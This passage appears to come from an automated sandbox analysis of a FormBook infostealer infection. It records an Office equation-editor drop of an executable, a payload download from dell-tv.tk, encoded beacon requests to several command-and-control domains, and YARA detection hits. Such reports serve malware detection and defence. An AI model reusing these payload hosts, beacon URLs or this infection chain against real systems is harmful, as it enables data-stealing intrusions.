3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:10:37 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be75c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 17:10:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingcache-control: no-cacheCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E%2BS9g0CLJW2CTVsxvlIjpGyQWc73vohHYhkK3DVTZy%2F85cz2tAKSxAl6hkRn4vGBjwJew1vfLxOKQGCx0JpcyX%2F5maQz5OwqFwHVCEGtmJNlPxIG7g0A%2BpMGv5y1Y30TbEd2CWDFg703UHV4AnI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6b3c7df37c1c4230-AMSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.442701106.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.466348639.0000000001BD0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico95
          Source: explorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438482081.000000000844F000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.453053501.000000000844F000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoICROS~4.LNK
          Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp0
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehpC
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443564000.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450764826.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432948850.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.442612766.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.516156334.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1301DF5A-9B1F-4290-90EE-2E8BF9838615}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: dell-tv.tk
          Source: global trafficHTTP traffic detected: GET /ashlyzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dell-tv.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1Host: www.texaszephyr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1Host: www.publicfigure.skinConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1Host: www.volunteervabetweenk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exeJump to dropped file
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
